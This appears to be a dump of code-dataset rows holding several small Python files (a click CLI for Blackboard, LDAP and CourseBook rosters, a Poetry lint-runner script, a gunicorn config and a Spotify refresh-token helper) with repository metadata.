    """Pretty-print a single dict as a one-row, left-aligned table."""
    if not row:
        return
    table = PrettyTable(list(row.keys()))
    table.add_row(list(row.values()))
    table.align = 'l'
    click.echo(table.get_string())
def _echo_item(x):
    """Echo ``x`` unless it is falsy."""
    if x:
        click.echo(x)
import os
import logging
import click
import click_log
from . import config
_logger = logging.getLogger(__name__)
click_log.basic_config(_logger)
@click.group()
def cli():
    # Root click group; all subcommand groups below attach to this.
    pass
from . import blackboard
@cli.group(name='blackboard')
def cli_blackboard():
    # Container group for Blackboard-related commands.
    pass
@cli_blackboard.command(name='download', help='Download')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('link_text', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_download(netid, get_password, link_text):
    # Fall back to configured defaults when options were not supplied.
    netid = config.NETID if netid is None else netid
    get_password = config.get_password if get_password is None else get_password
    result = blackboard.download(netid=netid, get_password=get_password, link_text=link_text)
    _echo_item(result)
@cli_blackboard.command(name='upload', help='Upload')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('link_text', type=click.STRING)
@click.argument('path', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_upload(netid, get_password, link_text, path):
    # Fall back to configured defaults when options were not supplied.
    netid = config.NETID if netid is None else netid
    get_password = config.get_password if get_password is None else get_password
    blackboard.upload(netid=netid, get_password=get_password, link_text=link_text, path=path)
@cli_blackboard.command(name='webassign', help='WebAssign')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('link_text', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_webassign(netid, get_password, link_text):
    # Fall back to configured defaults when options were not supplied.
    netid = config.NETID if netid is None else netid
    get_password = config.get_password if get_password is None else get_password
    blackboard.webassign(netid=netid, get_password=get_password, link_text=link_text)
@cli_blackboard.command(name='combo', help='Combine the other commands')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.option('--upload', type=click.Path(exists=True), default=None, help="CSV to upload.")
@click.option('--webassign/--no-webassign', default=False, help="Export/import WebAssign.")
@click.option('--download/--no-download', default=True, help="Download CSV.")
@click.argument('link_text', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_combo(netid, get_password, link_text, upload, webassign, download):
    # Bug fix: this function was named cli_blackboard_webassign, shadowing
    # the 'webassign' command's function above at module level. The
    # registered CLI name ('combo') is unchanged.
    if netid is None:
        netid = config.NETID
    if get_password is None:
        get_password = config.get_password
    if upload is not None:
        blackboard.upload(netid=netid, get_password=get_password, link_text=link_text, path=upload)
    if webassign:
        blackboard.webassign(netid=netid, get_password=get_password, link_text=link_text)
    if download:
        x = blackboard.download(netid=netid, get_password=get_password, link_text=link_text)
        _echo_item(x)
from . import ldap
@cli.group(name='ldap')
def cli_ldap():
    # Container group for LDAP directory lookup commands.
    pass
@cli_ldap.command(name='filter', help='LDAP search with user-specified filter.')
@click.argument('filter', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_filter(filter, keys):
    # Bug fix: the original was ``list(ldap.filter(filter), list(keys))``,
    # which calls list() with two arguments (a TypeError) and never
    # forwards ``keys`` to the search.
    rows = list(ldap.filter(filter, list(keys)))
    _echo_table(rows)
@cli_ldap.command(name='search', help='Perform an LDAP search with filter: .' + ldap.SEARCH_FILTER)
@click.argument('term', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_search(term, keys):
    # Run the canned search and render the matches as a table.
    _echo_table(list(ldap.search(term, list(keys))))
@cli_ldap.command(name='netid', help='Filter by NetID')
@click.argument('netid', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_netid(netid, keys):
    # Single-record lookup; render as a one-row table.
    _echo_row(ldap.netid(netid, list(keys)))
@cli_ldap.command(name='alias', help='Filter by alias/PEA')
@click.argument('alias', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_alias(alias, keys):
    # Single-record lookup; render as a one-row table.
    _echo_row(ldap.alias(alias, list(keys)))
@cli_ldap.command(name='netid-to-alias', help='NetID -> alias/PEA')
@click.argument('netid', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_netid_to_alias(netid):
    # Translate and echo (nothing printed for an empty result).
    _echo_item(ldap.netid_to_alias(netid))
@cli_ldap.command(name='alias-to-netid', help='alias -> NetID')
@click.argument('alias', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_alias_to_netid(alias):
    # Translate and echo (nothing printed for an empty result).
    _echo_item(ldap.alias_to_netid(alias))
import os
import shutil
from . import coursebook
@cli.group(name='coursebook')
def cli_coursebook():
    # Container group for CourseBook commands.
    pass
@cli_coursebook.group(name='db')
def cli_coursebook_db():
    # Subgroup for local CourseBook database operations.
    pass
@cli_coursebook_db.command(name='update')
def cli_coursebook_db_update():
    # Delegates entirely to coursebook.db_update().
    coursebook.db_update()
@cli_coursebook_db.command(name='netid-to-address')
@click.argument('netid', type=click.STRING)
def cli_coursebook_db_netid_to_address(netid):
    # Echo all addresses for the NetID on one space-separated line.
    addresses = list(coursebook.db_netid_to_address(netid))
    _echo_item(' '.join(addresses))
@cli_coursebook.group(name='roster')
def cli_coursebook_roster():
    # Subgroup for CourseBook roster operations.
    pass
@cli_coursebook_roster.command(name='xlsx-to-csv', help='Convert a CourseBook roster XLSX to CSV.')
@click.option('--force/--no-force', default=False, help="Overwrite existing file.")
@click.argument('source', type=click.Path(exists=True))
@click.argument('target', type=click.Path())
def cli_coursebook_xlsx_to_csv(force, source, target):
    # Refuse to clobber an existing target unless --force was given.
    if not force and os.path.exists(target):
        raise click.ClickException('File exists, maybe use --force?: ' + target)
    coursebook.roster_xlsx_to_csv(source, target)
@cli_coursebook_roster.group(name='download')
def cli_coursebook_roster_download():
    # NOTE(review): this group appears vestigial -- a command registered
    # under the same click name ('download') immediately below takes
    # precedence on the parent group. Confirm before removing.
    pass
@cli_coursebook_roster.command(name='download', help='Download a CourseBook roster.')
@click.option('--force/--no-force', default=False, help="Overwrite existing file.")
@click.option('--new/--no-new', default=False, help="Get a new file (don't use the cache).")
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('address', nargs=-1, type=click.STRING)
def cli_coursebook_roster_download(netid, get_password, new, force, address):
    # Each ADDRESS is a destination path whose extension picks the format.
    def _split(x):
        y, f = os.path.splitext(x)
        return y, f[1:]
    # Validate every address up front, before doing any network work.
    for x in address:
        _, f = _split(x)
        if f not in coursebook.ROSTER_FORMAT:
            raise click.ClickException("{x}: I don't know how to download a `{f}`, only: {these}.".format(x=x, f=f, these=' '.join(coursebook.ROSTER_FORMAT)))
        # FIXME: check for proper address format
        if os.path.exists(x) and not force:
            raise click.ClickException('File exists, maybe use --force?: ' + x)
    if netid is None:
        netid = config.NETID
    if get_password is None:
        get_password = config.get_password
    if netid is None:
        # Bug fix: the {config} placeholder was never supplied to format()
        # (a positional value was passed), raising KeyError instead of
        # showing this message.
        raise click.ClickException('You must either specify a NetID in {config} or with --netid.'.format(config=config.CONFIG_FILE))
    for x in address:
        y, f = _split(x)
        # Download into the cache, then copy to the requested destination.
        z = coursebook.roster_download(netid=netid, get_password=get_password, address=y, format=f, new=new)
        shutil.copyfile(z, x)
| 34.108 | 158 | 0.72546 |
from prettytable import PrettyTable
from collections import OrderedDict
def _fieldnames(rows):
def g():
for row in rows:
yield from row
d = OrderedDict((k, None) for k in g())
return list(d.keys())
def _echo_table(rows):
if not rows: return
fieldnames = _fieldnames(rows)
table = PrettyTable(fieldnames)
table.align = 'l'
for row in rows:
table.add_row([row[k] or '' for k in fieldnames])
click.echo(table.get_string())
def _echo_row(row):
if not row: return
table = PrettyTable(row.keys())
table.align = 'l'
table.add_row(row.values())
click.echo(table.get_string())
def _echo_item(x):
if not x: return
click.echo(x)
import os
import logging
import click
import click_log
from . import config
_logger = logging.getLogger(__name__)
click_log.basic_config(_logger)
# Root click group; all subcommand groups below attach to this.
@click.group()
def cli():
    pass
from . import blackboard
# Parent group for Blackboard-related subcommands.
@cli.group(name='blackboard')
def cli_blackboard():
    pass
@cli_blackboard.command(name='download', help='Download')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('link_text', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_download(netid, get_password, link_text):
    """Download via blackboard.download and echo the result; NetID/password fall back to config."""
    if netid is None: netid = config.NETID
    if get_password is None: get_password = config.get_password
    x = blackboard.download(netid=netid, get_password=get_password, link_text=link_text)
    _echo_item(x)
@cli_blackboard.command(name='upload', help='Upload')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('link_text', type=click.STRING)
@click.argument('path', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_upload(netid, get_password, link_text, path):
    """Upload the file at PATH via blackboard.upload under LINK_TEXT."""
    if netid is None: netid = config.NETID
    if get_password is None: get_password = config.get_password
    blackboard.upload(netid=netid, get_password=get_password, link_text=link_text, path=path)
@cli_blackboard.command(name='webassign', help='WebAssign')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('link_text', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_webassign(netid, get_password, link_text):
    """Trigger blackboard.webassign for LINK_TEXT."""
    if netid is None: netid = config.NETID
    if get_password is None: get_password = config.get_password
    blackboard.webassign(netid=netid, get_password=get_password, link_text=link_text)
# NOTE(review): this handler reuses the name `cli_blackboard_webassign`, which
# shadows the `webassign` command's handler defined earlier in this file. Click
# registered both commands at decoration time, so behavior is unaffected, but
# the earlier module-level binding is lost — consider renaming this function
# to `cli_blackboard_combo`.
@cli_blackboard.command(name='combo', help='Combine the other commands')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.option('--upload', type=click.Path(exists=True), default=None, help="CSV to upload.")
@click.option('--webassign/--no-webassign', default=False, help="Export/import WebAssign.")
@click.option('--download/--no-download', default=True, help="Download CSV.")
@click.argument('link_text', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_webassign(netid, get_password, link_text, upload, webassign, download):
    """Optionally upload a CSV, trigger WebAssign, then download and echo the result."""
    if netid is None: netid = config.NETID
    if get_password is None: get_password = config.get_password
    if not (upload is None):
        blackboard.upload(netid=netid, get_password=get_password, link_text=link_text, path=upload)
    if webassign:
        blackboard.webassign(netid=netid, get_password=get_password, link_text=link_text)
    if download:
        x = blackboard.download(netid=netid, get_password=get_password, link_text=link_text)
        _echo_item(x)
from . import ldap
# Parent group for the LDAP lookup subcommands.
@cli.group(name='ldap')
def cli_ldap():
    pass
@cli_ldap.command(name='filter', help='LDAP search with user-specified filter.')
@click.argument('filter', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_filter(filter, keys):
    """Run an LDAP search with a user-supplied FILTER and print KEYS as a table."""
    # BUG FIX: the original `list(ldap.filter(filter), list(keys))` passed two
    # arguments to list() (a TypeError at runtime) and never forwarded `keys`.
    # Mirror the call shape used by `cli_ldap_search` below.
    rows = list(ldap.filter(filter, list(keys)))
    _echo_table(rows)
@cli_ldap.command(name='search', help='Perform an LDAP search with filter: .' + ldap.SEARCH_FILTER)
@click.argument('term', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_search(term, keys):
    """Search LDAP for TERM and print the requested KEYS as a table."""
    rows = list(ldap.search(term, list(keys)))
    _echo_table(rows)
@cli_ldap.command(name='netid', help='Filter by NetID')
@click.argument('netid', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_netid(netid, keys):
    """Look up a single LDAP entry by NetID and print the requested KEYS."""
    row = ldap.netid(netid, list(keys))
    _echo_row(row)
@cli_ldap.command(name='alias', help='Filter by alias/PEA')
@click.argument('alias', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_alias(alias, keys):
    """Look up a single LDAP entry by alias/PEA and print the requested KEYS."""
    row = ldap.alias(alias, list(keys))
    _echo_row(row)
@cli_ldap.command(name='netid-to-alias', help='NetID -> alias/PEA')
@click.argument('netid', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_netid_to_alias(netid):
    """Translate a NetID to its alias/PEA and echo it."""
    x = ldap.netid_to_alias(netid)
    _echo_item(x)
@cli_ldap.command(name='alias-to-netid', help='alias -> NetID')
@click.argument('alias', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_alias_to_netid(alias):
    """Translate an alias/PEA to its NetID and echo it."""
    x = ldap.alias_to_netid(alias)
    _echo_item(x)
import os
import shutil
from . import coursebook
# Parent group for CourseBook subcommands.
@cli.group(name='coursebook')
def cli_coursebook():
    pass
# Subgroup for the local CourseBook database.
@cli_coursebook.group(name='db')
def cli_coursebook_db():
    pass
@cli_coursebook_db.command(name='update')
def cli_coursebook_db_update():
    """Refresh the local CourseBook database."""
    coursebook.db_update()
@cli_coursebook_db.command(name='netid-to-address')
@click.argument('netid', type=click.STRING)
def cli_coursebook_db_netid_to_address(netid):
    """Echo the address(es) recorded for NETID, space-separated."""
    X = list(coursebook.db_netid_to_address(netid))
    _echo_item(' '.join(X))
# Subgroup for roster operations.
@cli_coursebook.group(name='roster')
def cli_coursebook_roster():
    pass
@cli_coursebook_roster.command(name='xlsx-to-csv', help='Convert a CourseBook roster XLSX to CSV.')
@click.option('--force/--no-force', default=False, help="Overwrite existing file.")
@click.argument('source', type=click.Path(exists=True))
@click.argument('target', type=click.Path())
def cli_coursebook_xlsx_to_csv(force, source, target):
    """Convert the roster spreadsheet at SOURCE into a CSV written to TARGET."""
    # Guard clause: never silently clobber an existing target file.
    target_present = os.path.exists(target)
    if target_present and not force:
        raise click.ClickException('File exists, maybe use --force?: ' + target)
    coursebook.roster_xlsx_to_csv(source, target)
# NOTE(review): this group is registered under the same name ('download') as
# the command added to `cli_coursebook_roster` immediately below; the later
# registration replaces this one, so this group appears to be dead code —
# confirm and remove.
@cli_coursebook_roster.group(name='download')
def cli_coursebook_roster_download():
    pass
@cli_coursebook_roster.command(name='download', help='Download a CourseBook roster.')
@click.option('--force/--no-force', default=False, help="Overwrite existing file.")
@click.option('--new/--no-new', default=False, help="Get a new file (don't use the cache).")
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('address', nargs=-1, type=click.STRING)
def cli_coursebook_roster_download(netid, get_password, new, force, address):
    """Download one CourseBook roster per ADDRESS; the file extension selects the format."""
    def _split(x):
        # Split 'address.ext' into ('address', 'ext') with the leading dot removed.
        y, f = os.path.splitext(x)
        return y, f[1:]
    # Validate every target before doing any network work.
    for x in address:
        _, f = _split(x)
        if f not in coursebook.ROSTER_FORMAT:
            raise click.ClickException("{x}: I don't know how to download a `{f}`, only: {these}.".format(x=x, f=f, these=' '.join(coursebook.ROSTER_FORMAT)))
        # FIXME: check for proper address format
        if os.path.exists(x) and not force:
            raise click.ClickException('File exists, maybe use --force?: ' + x)
    if netid is None: netid = config.NETID
    if get_password is None: get_password = config.get_password
    if netid is None:
        # BUG FIX: .format() was called positionally, so the '{config}'
        # placeholder raised KeyError instead of producing this message.
        raise click.ClickException('You must either specify a NetID in {config} or with --netid.'.format(config=config.CONFIG_FILE))
    for x in address:
        y, f = _split(x)
        # roster_download returns a path; copy that file into place at x.
        z = coursebook.roster_download(netid=netid, get_password=get_password, address=y, format=f, new=new)
        shutil.copyfile(z, x)
| true | true |
79012480958bbdebc69a16fb38f259e850c32a78 | 2,872 | py | Python | check_commit.py | Cocopyth/foodshare | 1e997522b90bc11749265b7d31bea32a2bc03878 | [
"Apache-2.0"
] | null | null | null | check_commit.py | Cocopyth/foodshare | 1e997522b90bc11749265b7d31bea32a2bc03878 | [
"Apache-2.0"
] | 10 | 2020-03-26T14:53:29.000Z | 2021-06-10T17:21:53.000Z | check_commit.py | Cocopyth/foodshare | 1e997522b90bc11749265b7d31bea32a2bc03878 | [
"Apache-2.0"
] | null | null | null | """This script runs code quality checks on given Python files.
Note: This script assumes you use Poetry as your dependency manager.
Run the following in your terminal to get help on how to use this script:
```shell
poetry run python check_commit.py -h
```
"""
import argparse
import subprocess
from colorama import Fore, Style, deinit, init
def blue_bold(message: str) -> str:
    """Return *message* wrapped in bright-blue ANSI color codes."""
    return f'{Fore.BLUE}{Style.BRIGHT}{message}{Style.RESET_ALL}'
def light(message: str) -> str:
    """Return *message* wrapped in dim-style ANSI codes."""
    return f'{Style.DIM}{message}{Style.RESET_ALL}'
def run_task(task_message: str, command: str) -> None:
    """Run a task in the shell, defined by a task message and its associated
    command."""
    print(blue_bold(task_message))
    # Echo the command being run, shell-prompt style.
    print(light(f'$ {command}'))
    # NOTE(review): shell=True is acceptable for this trusted dev script; the
    # exit status is ignored, so a failing check does not stop later ones.
    subprocess.call(command, shell=True)
    # Blank line separates the output of consecutive tasks.
    print()
if __name__ == '__main__':
# initialise terminal colors
init()
# create parser
parser = argparse.ArgumentParser(
description=(
f'Run code quality checks on the given Python files. By default '
f'this script runs isort, Black and Flake8 successively but you '
f'can use the parameters to selectively run some of these checks.'
),
epilog=(
'examples:\n'
'\n'
' # run all checks on the my_package/ Python package\n'
' $ poetry run python check_commit.py my_package\n'
'\n'
' # run Black and Flake8 on the la.py file and the foo/ folder\n'
' $ poetry run python check_commit.py -b -f8 la.py foo\n'
),
formatter_class=argparse.RawTextHelpFormatter,
)
# add parser arguments
parser.add_argument(
'-i',
'--isort',
help='run isort on the given files',
action='store_true',
)
parser.add_argument(
'-b',
'--black',
help='run Black on the given files',
action='store_true',
)
parser.add_argument(
'-f8',
'--flake8',
help='run Flake8 on the given files',
action='store_true',
)
parser.add_argument(
'files', type=str, nargs='+', help='list of files or directories',
)
# parse arguments
args = parser.parse_args()
# run checks
run_all_checks = not args.isort and not args.black and not args.flake8
files = ' '.join(args.files)
if run_all_checks or args.isort:
run_task(
'Run import autosorting with isort...',
f'poetry run isort -rc {files}',
)
if run_all_checks or args.black:
run_task(
'Run code formatting with Black...', f'poetry run black {files}',
)
if run_all_checks or args.flake8:
run_task(
'Run code linting with Flake8...', f'poetry run flake8 {files}',
)
# de-initialise terminal colors
deinit()
| 27.09434 | 78 | 0.605153 |
import argparse
import subprocess
from colorama import Fore, Style, deinit, init
def blue_bold(message: str) -> str:
    """Return *message* wrapped in bright-blue ANSI color codes."""
    return f'{Fore.BLUE}{Style.BRIGHT}{message}{Style.RESET_ALL}'
def light(message: str) -> str:
    """Return *message* wrapped in dim-style ANSI codes."""
    return f'{Style.DIM}{message}{Style.RESET_ALL}'
def run_task(task_message: str, command: str) -> None:
    """Print a task heading and the command, then run the command in the shell."""
    print(blue_bold(task_message))
    print(light(f'$ {command}'))
    subprocess.call(command, shell=True)
    print()
if __name__ == '__main__':
    # Initialise terminal colors.
    init()
    # Create parser.
    parser = argparse.ArgumentParser(
        description=(
            f'Run code quality checks on the given Python files. By default '
            f'this script runs isort, Black and Flake8 successively but you '
            f'can use the parameters to selectively run some of these checks.'
        ),
        epilog=(
            'examples:\n'
            '\n'
            ' # run all checks on the my_package/ Python package\n'
            ' $ poetry run python check_commit.py my_package\n'
            '\n'
            ' # run Black and Flake8 on the la.py file and the foo/ folder\n'
            ' $ poetry run python check_commit.py -b -f8 la.py foo\n'
        ),
        formatter_class=argparse.RawTextHelpFormatter,
    )
    # Add parser arguments.
    parser.add_argument(
        '-i',
        '--isort',
        help='run isort on the given files',
        action='store_true',
    )
    parser.add_argument(
        '-b',
        '--black',
        help='run Black on the given files',
        action='store_true',
    )
    parser.add_argument(
        '-f8',
        '--flake8',
        help='run Flake8 on the given files',
        action='store_true',
    )
    parser.add_argument(
        'files', type=str, nargs='+', help='list of files or directories',
    )
    # Parse arguments.
    args = parser.parse_args()
    # Run checks: when no selective flag is given, run everything.
    run_all_checks = not args.isort and not args.black and not args.flake8
    files = ' '.join(args.files)
    if run_all_checks or args.isort:
        run_task(
            'Run import autosorting with isort...',
            f'poetry run isort -rc {files}',
        )
    if run_all_checks or args.black:
        run_task(
            'Run code formatting with Black...', f'poetry run black {files}',
        )
    if run_all_checks or args.flake8:
        run_task(
            'Run code linting with Flake8...', f'poetry run flake8 {files}',
        )
    # De-initialise terminal colors.
    deinit()
| true | true |
790124d3352f34e789b4be873b4a669f51d97eff | 140 | py | Python | gunicorn.conf.py | ShiZhuming/StyleTransfer | cba2a3ceb733a2d129d52d4a3cac07c7651bd928 | [
"MIT"
] | 10 | 2020-05-28T05:31:15.000Z | 2021-04-12T20:15:26.000Z | gunicorn.conf.py | ShiZhuming/StyleTransfer | cba2a3ceb733a2d129d52d4a3cac07c7651bd928 | [
"MIT"
] | 4 | 2021-06-08T21:40:48.000Z | 2022-03-12T00:32:15.000Z | gunicorn.conf.py | ShiZhuming/StyleTransfer | cba2a3ceb733a2d129d52d4a3cac07c7651bd928 | [
"MIT"
] | 1 | 2020-05-31T11:12:08.000Z | 2020-05-31T11:12:08.000Z | workers = 1 # 定义同时开启的处理请求的进程数量,根据网站流量适当调整
worker_class = "gevent" # 采用gevent库,支持异步处理请求,提高吞吐量
# bind = "0.0.0.0:80"
bind = "0.0.0.0:80"
| 28 | 52 | 0.671429 | workers = 1
worker_class = "gevent" # gevent workers handle requests asynchronously
bind = "0.0.0.0:80" # listen on all interfaces, port 80
| true | true |
790124d82caa5f08062819b100e64f56b6ee4ca7 | 648 | py | Python | spotify_setup.py | Nomad95/spotify-leds | 2774a4a66c6e2a38950875d48047d52f6c8403a9 | [
"MIT"
] | 93 | 2018-11-12T21:38:45.000Z | 2022-03-31T05:46:02.000Z | spotify_setup.py | Georgej5/Colorfy | 69e8573840df6ac9090f346256157015166620cb | [
"MIT"
] | 12 | 2019-01-28T19:17:47.000Z | 2022-03-11T23:34:50.000Z | spotify_setup.py | Georgej5/Colorfy | 69e8573840df6ac9090f346256157015166620cb | [
"MIT"
] | 9 | 2019-10-21T00:10:30.000Z | 2021-05-18T04:46:49.000Z | """Script that generates a refresh token for a specific user."""
import os
import sys
import spotipy.util as util
import json
if len(sys.argv) == 2:
username = str(sys.argv[1])
else:
print('Usage: {} username'.format(sys.argv[0]))
sys.exit(1)
scope = 'user-read-currently-playing user-read-playback-state'
# Get tokens from Spotify.
try:
util.prompt_for_user_token(username, scope)
except:
raise RuntimeError('Could not fetch token.')
# Print refresh token.
with open('.cache-{}'.format(username)) as json_file:
data = json.load(json_file)
print('Refresh token for {}: {}'.format(username, data['refresh_token']))
| 24.923077 | 77 | 0.699074 | import os
import sys
import spotipy.util as util
import json
# Require exactly one argument: the Spotify username.
if len(sys.argv) == 2:
    username = str(sys.argv[1])
else:
    print('Usage: {} username'.format(sys.argv[0]))
    sys.exit(1)
# OAuth scopes needed to read the user's playback state.
scope = 'user-read-currently-playing user-read-playback-state'
# Fetch tokens from Spotify.
try:
    util.prompt_for_user_token(username, scope)
except:
    # NOTE(review): bare except also traps KeyboardInterrupt/SystemExit and
    # discards the cause; prefer `except Exception as exc: ... from exc`.
    raise RuntimeError('Could not fetch token.')
# Read the cached token file for this user and print the refresh token.
with open('.cache-{}'.format(username)) as json_file:
    data = json.load(json_file)
    print('Refresh token for {}: {}'.format(username, data['refresh_token']))
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.